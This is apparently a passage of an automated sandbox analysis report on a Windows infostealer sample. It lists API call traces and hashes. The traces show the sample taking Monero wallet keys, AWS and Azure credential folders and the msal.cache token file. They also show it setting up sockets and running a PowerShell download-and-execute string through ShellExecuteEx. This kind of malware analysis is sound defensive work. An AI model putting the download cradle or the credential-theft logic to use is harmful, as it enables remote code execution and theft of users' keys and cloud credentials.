                                • Opcode Fuzzy Hash: 30356d43868026e66cb99f5eccb4664cba0caef45406f6d4a0db6fffbf0f6a38
                                • Instruction Fuzzy Hash: A4B1B330A102199BEF72EF79DD49A6E3BE8AF04304F141068FB85E7291DB78DC419794
                                APIs
                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 010057D5
                                • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 01005804
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01005835
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0100585D
                                • lstrcat.KERNEL32(00000000,00000000), ref: 01005868
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01005890
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 010058C8
                                • lstrcat.KERNEL32(00000000,00000000), ref: 010058D3
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 010058F8
                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 0100592E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01005956
                                • lstrcat.KERNEL32(00000000,00000000), ref: 01005961
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01005988
                                • lstrlen.KERNEL32(01021794), ref: 0100599A
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 010059B9
                                • lstrcat.KERNEL32(00000000,01021794), ref: 010059C5
                                • lstrlen.KERNEL32(00D6D248), ref: 010059D4
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 010059F7
                                • lstrcat.KERNEL32(00000000,00000000), ref: 01005A02
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01005A2C
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01005A58
                                • GetFileAttributesA.KERNEL32(00000000), ref: 01005A5F
                                • lstrcpy.KERNEL32(00000000,?), ref: 01005AB7
                                • lstrcpy.KERNEL32(00000000,?), ref: 01005B2D
                                • lstrcpy.KERNEL32(00000000,?), ref: 01005B56
                                • lstrcpy.KERNEL32(00000000,?), ref: 01005B89
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01005BB5
                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 01005BEF
                                • lstrcpy.KERNEL32(00000000,?), ref: 01005C4C
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01005C70
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                 • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$lstrlen$AttributesFileFolderPath
                                • String ID:
                                • API String ID: 2428362635-0
                                • Opcode ID: 7870ac23fe7429bd2a125440d672382d5602a634d7318fbdb4ac0e8a4975004f
                                • Instruction ID: b79597c96cf5ffb3aebbfbd4f70337aafa3a6be110939ad227c5d8be51f5264c
                                • Opcode Fuzzy Hash: 7870ac23fe7429bd2a125440d672382d5602a634d7318fbdb4ac0e8a4975004f
                                • Instruction Fuzzy Hash: 5E02B6709012199FEF72EF68DC89AAE7BF9AF44300F144068FA45A7290DB78DD459F90
                                APIs
                                  • Part of subcall function 00FF1120: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00FF1135
                                  • Part of subcall function 00FF1120: RtlAllocateHeap.NTDLL(00000000), ref: 00FF113C
                                  • Part of subcall function 00FF1120: RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 00FF1159
                                  • Part of subcall function 00FF1120: RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 00FF1173
                                  • Part of subcall function 00FF1120: RegCloseKey.ADVAPI32(?), ref: 00FF117D
                                • lstrcat.KERNEL32(?,00000000), ref: 00FF11C0
                                • lstrlen.KERNEL32(?), ref: 00FF11CD
                                • lstrcat.KERNEL32(?,.keys), ref: 00FF11E8
                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 00FF121F
                                • lstrlen.KERNEL32(00D68980), ref: 00FF122D
                                • lstrcpy.KERNEL32(00000000,?), ref: 00FF1251
                                • lstrcat.KERNEL32(00000000,00D68980), ref: 00FF1259
                                • lstrlen.KERNEL32(\Monero\wallet.keys), ref: 00FF1264
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FF1288
                                • lstrcat.KERNEL32(00000000,\Monero\wallet.keys), ref: 00FF1294
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FF12BA
                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 00FF12FF
                                • lstrlen.KERNEL32(00D6D398), ref: 00FF130E
                                • lstrcpy.KERNEL32(00000000,?), ref: 00FF1335
                                • lstrcat.KERNEL32(00000000,?), ref: 00FF133D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FF1378
                                • lstrcat.KERNEL32(00000000), ref: 00FF1385
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FF13AC
                                • CopyFileA.KERNEL32(?,?,00000001), ref: 00FF13D5
                                • lstrcpy.KERNEL32(00000000,?), ref: 00FF1401
                                • lstrcpy.KERNEL32(00000000,?), ref: 00FF143D
                                  • Part of subcall function 0100EDE0: lstrcpy.KERNEL32(00000000,?), ref: 0100EE12
                                • DeleteFileA.KERNEL32(?), ref: 00FF1471
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                 • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$lstrlen$FileHeap$AllocateCloseCopyDeleteOpenProcessQueryValue
                                • String ID: .keys$\Monero\wallet.keys
                                • API String ID: 2881711868-3586502688
                                • Opcode ID: 873ac5ffcb2e3276206ce7ca5381f77c179d663f25d2b1e310951b56067f4c0f
                                • Instruction ID: 2e955558c237b62b5f36f8123794e4a875ae3eef37e684ef16fbe9c461d3cdc7
                                • Opcode Fuzzy Hash: 873ac5ffcb2e3276206ce7ca5381f77c179d663f25d2b1e310951b56067f4c0f
                                • Instruction Fuzzy Hash: 01A17F31E10219ABDB31EFA4DC89ABE77B8BF44310F041028FA05E7265DB78DD41AB90
                                APIs
                                • memset.MSVCRT ref: 0100E740
                                • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 0100E769
                                • lstrcpy.KERNEL32(00000000,?), ref: 0100E79F
                                • lstrcat.KERNEL32(?,00000000), ref: 0100E7AD
                                • lstrcat.KERNEL32(?,\.azure\), ref: 0100E7C6
                                • memset.MSVCRT ref: 0100E805
                                • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 0100E82D
                                • lstrcpy.KERNEL32(00000000,?), ref: 0100E85F
                                • lstrcat.KERNEL32(?,00000000), ref: 0100E86D
                                • lstrcat.KERNEL32(?,\.aws\), ref: 0100E886
                                • memset.MSVCRT ref: 0100E8C5
                                • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0100E8F1
                                • lstrcpy.KERNEL32(00000000,?), ref: 0100E920
                                • lstrcat.KERNEL32(?,00000000), ref: 0100E92E
                                • lstrcat.KERNEL32(?,\.IdentityService\), ref: 0100E947
                                • memset.MSVCRT ref: 0100E986
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                 • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$memset$FolderPathlstrcpy
                                • String ID: *.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                • API String ID: 4067350539-3645552435
                                • Opcode ID: 57f7cf6d478b3b5f750caa3891a6cc56bcf48abed30796b0cd931e6a7e024a95
                                • Instruction ID: 0def53e590ad90d4d6f8fc74a3c2bfb196b060a5d0aa8bb7852fd304bfeb8c6b
                                • Opcode Fuzzy Hash: 57f7cf6d478b3b5f750caa3891a6cc56bcf48abed30796b0cd931e6a7e024a95
                                • Instruction Fuzzy Hash: 4171D87194022CABEB71EB64DC4AFED7774AF48700F400898F759AB1C0DBB89B848B54
                                APIs
                                • lstrcpy.KERNEL32 ref: 0100ABCF
                                • lstrlen.KERNEL32(00D6EBB0), ref: 0100ABE5
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0100AC0D
                                • lstrcat.KERNEL32(00000000,00000000), ref: 0100AC18
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0100AC41
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0100AC84
                                • lstrcat.KERNEL32(00000000,00000000), ref: 0100AC8E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0100ACB7
                                • lstrlen.KERNEL32(01024AD4), ref: 0100ACD1
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0100ACF3
                                • lstrcat.KERNEL32(00000000,01024AD4), ref: 0100ACFF
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0100AD28
                                • lstrlen.KERNEL32(01024AD4), ref: 0100AD3A
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0100AD5C
                                • lstrcat.KERNEL32(00000000,01024AD4), ref: 0100AD68
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0100AD91
                                • lstrlen.KERNEL32(00D6EA30), ref: 0100ADA7
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0100ADCF
                                • lstrcat.KERNEL32(00000000,00000000), ref: 0100ADDA
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0100AE03
                                • lstrcpy.KERNEL32(00000000,?), ref: 0100AE3F
                                • lstrcat.KERNEL32(00000000,00000000), ref: 0100AE49
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0100AE6F
                                • lstrlen.KERNEL32(00000000), ref: 0100AE85
                                • lstrcpy.KERNEL32(00000000,00D6EC28), ref: 0100AEB8
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                 • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$lstrlen
                                • String ID: f
                                • API String ID: 2762123234-1993550816
                                • Opcode ID: 7c6e7ab9b8001b4b6d0d7ae06ec7346efd44c5034c6f2a170cd155891ec086bd
                                • Instruction ID: 41fcee77ac02fb1604405cebad4291c8a96ff31d5769c2e4e8b5bfd02ebbbb73
                                • Opcode Fuzzy Hash: 7c6e7ab9b8001b4b6d0d7ae06ec7346efd44c5034c6f2a170cd155891ec086bd
                                • Instruction Fuzzy Hash: 08B18130A1061AEBEB72EF68DC49ABF77F9AF40304F040464FA45972A5DB78D941DB90
                                APIs
                                • LoadLibraryA.KERNEL32(ws2_32.dll,?,010072A4), ref: 010147E6
                                • GetProcAddress.KERNEL32(00000000,connect), ref: 010147FC
                                • GetProcAddress.KERNEL32(00000000,WSAStartup), ref: 0101480D
                                • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 0101481E
                                • GetProcAddress.KERNEL32(00000000,htons), ref: 0101482F
                                • GetProcAddress.KERNEL32(00000000,WSACleanup), ref: 01014840
                                • GetProcAddress.KERNEL32(00000000,recv), ref: 01014851
                                • GetProcAddress.KERNEL32(00000000,socket), ref: 01014862
                                • GetProcAddress.KERNEL32(00000000,freeaddrinfo), ref: 01014873
                                • GetProcAddress.KERNEL32(00000000,closesocket), ref: 01014884
                                • GetProcAddress.KERNEL32(00000000,send), ref: 01014895
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                 • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$LibraryLoad
                                • String ID: WSACleanup$WSAStartup$closesocket$connect$freeaddrinfo$getaddrinfo$htons$recv$send$socket$ws2_32.dll
                                • API String ID: 2238633743-3087812094
                                • Opcode ID: e9493215f87182999ec3aac7606e8c1e84ad48d90e90f35a2af0977b9ab94a8d
                                • Instruction ID: beb79afdd29c3bed9fd7e6d444ad374ddabb0ceef4b30675137d5e3a5115d9d8
                                • Opcode Fuzzy Hash: e9493215f87182999ec3aac7606e8c1e84ad48d90e90f35a2af0977b9ab94a8d
                                • Instruction Fuzzy Hash: 7A11BA72952334BBDB309FB5BC0EE9E3AF8BA09619714281EF591EA118D6F88140DF54
                                APIs
                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 0100BE53
                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 0100BE86
                                • lstrlen.KERNEL32(-nop -c "iex(New-Object Net.WebClient).DownloadString('), ref: 0100BE91
                                • lstrcpy.KERNEL32(00000000,?), ref: 0100BEB1
                                • lstrcat.KERNEL32(00000000,-nop -c "iex(New-Object Net.WebClient).DownloadString('), ref: 0100BEBD
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0100BEE0
                                • lstrcat.KERNEL32(00000000,00000000), ref: 0100BEEB
                                • lstrlen.KERNEL32(')"), ref: 0100BEF6
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0100BF13
                                • lstrcat.KERNEL32(00000000,')"), ref: 0100BF1F
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0100BF46
                                • lstrlen.KERNEL32(C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe), ref: 0100BF66
                                • lstrcpy.KERNEL32(00000000,?), ref: 0100BF88
                                • lstrcat.KERNEL32(00000000,C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe), ref: 0100BF94
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0100BFBA
                                • ShellExecuteEx.SHELL32(?), ref: 0100C00C
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                 • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$lstrlen$ExecuteShell
                                • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                • API String ID: 4016326548-898575020
                                • Opcode ID: 14d1620639190955b8ac441cc665820cca4c2f9b3b2a73b1ebf49d8de92c26ec
                                • Instruction ID: e1ff87c8af792b8e4d73f6013b3c6a355e059d6f3e46416f0d0685ee98af4530
                                • Opcode Fuzzy Hash: 14d1620639190955b8ac441cc665820cca4c2f9b3b2a73b1ebf49d8de92c26ec
                                • Instruction Fuzzy Hash: 7461D334A10259ABFF72AFB99C8D67F7BE8AF04300F001468F645E7291DB78C9419B90
                                APIs
                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 0101184F
                                • lstrlen.KERNEL32(00D56B90), ref: 01011860
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01011887
                                • lstrcat.KERNEL32(00000000,00000000), ref: 01011892
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 010118C1
                                • lstrlen.KERNEL32(01024FA0), ref: 010118D3
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 010118F4
                                • lstrcat.KERNEL32(00000000,01024FA0), ref: 01011900
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0101192F
                                • lstrlen.KERNEL32(00D56AE0), ref: 01011945
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0101196C
                                • lstrcat.KERNEL32(00000000,00000000), ref: 01011977
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 010119A6
                                • lstrlen.KERNEL32(01024FA0), ref: 010119B8
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 010119D9
                                • lstrcat.KERNEL32(00000000,01024FA0), ref: 010119E5
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01011A14
                                • lstrlen.KERNEL32(00D56BF0), ref: 01011A2A
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01011A51
                                • lstrcat.KERNEL32(00000000,00000000), ref: 01011A5C
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01011A8B
                                • lstrlen.KERNEL32(00D56A20), ref: 01011AA1
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01011AC8
                                • lstrcat.KERNEL32(00000000,00000000), ref: 01011AD3
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01011B02
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                 • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcatlstrlen
                                • String ID:
                                • API String ID: 1049500425-0
                                • Opcode ID: 8fa8cf9de38ae8797b31cb003ac98a225790ebf3c417e2e18c93eadd11e47af1
                                • Instruction ID: cb4f28ea681b482f39354b936cf497d46e1a4ad7b0a8c029172f12047670effe
                                • Opcode Fuzzy Hash: 8fa8cf9de38ae8797b31cb003ac98a225790ebf3c417e2e18c93eadd11e47af1
                                • Instruction Fuzzy Hash: B5915E71600306ABEB709FB9EC88A2A7BEDAF14304F145468EBD6C7259DB7CD841DB50
                                APIs
                                • lstrcpy.KERNEL32(00000000,?), ref: 01004793
                                • LocalAlloc.KERNEL32(00000040,?), ref: 010047C5
                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 01004812
                                • lstrlen.KERNEL32(01024B60), ref: 0100481D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0100483A
                                • lstrcat.KERNEL32(00000000,01024B60), ref: 01004846
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0100486B
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01004898
                                • lstrcat.KERNEL32(00000000,00000000), ref: 010048A3
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 010048CA
                                • StrStrA.SHLWAPI(?,00000000), ref: 010048DC
                                • lstrlen.KERNEL32(?), ref: 010048F0
                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 01004931
